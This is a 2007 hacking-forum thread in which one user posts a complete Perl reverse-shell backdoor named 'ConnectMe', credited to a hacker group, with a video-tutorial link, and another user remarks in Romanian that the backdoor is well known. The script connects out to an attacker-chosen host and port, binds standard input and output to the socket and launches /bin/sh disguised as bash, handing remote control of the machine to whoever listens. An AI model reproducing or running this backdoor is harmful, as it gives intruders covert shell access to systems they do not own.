Ras Posted June 13, 2007 Report Share Posted June 13, 2007 #!/usr/bin/perl# ConnectMe version 1.0 (BackDoor)# IRAN HACKERZ SECURITY TEAM # By Hessam-x# keep Priv8 or die !! # Only for teamuse Socket;print "---------------------------------------\n";print "= ConnectMe (Back Backdoor) =\n";print "= IRAN HACKERZ SECURITY TEAM =\n";print "= coded by Hessam-x =\n";print "---------------------------------------\n";$host = $ARGV[0];$port = $ARGV[1]; if (!$ARGV[0]) { printf "[!] Usage: perl dc.pl <Host> <Port>\n"; exit(1);}print "[+] Connecting to $host\n";$prot = getprotobyname('tcp'); # u can change thissocket(SERVER, PF_INET, SOCK_STREAM, $prot) || die ("[-] Unable to Connect !");if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($host))) {die("[-] Unable to Connect !");} open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER");print "---------------------------------------\n";print "= ConnectMe (Back Backdoor) =\n";print "= IRAN HACKERZ SECURITY TEAM =\n";print "= coded by Hessam-x =\n";print "---------------------------------------\n"; exec {'/bin/sh'} '-bash' . "\0" x 4; Videotutorial: http://barzan.persiangig.com/Ro0t%20Video.zip Quote Link to comment Share on other sites More sharing options...
Dark_net Posted June 14, 2007 Report Share Posted June 14, 2007 Ii foarte cunoscut amuia acesta backdoor pentru reverse shell Quote Link to comment Share on other sites More sharing options...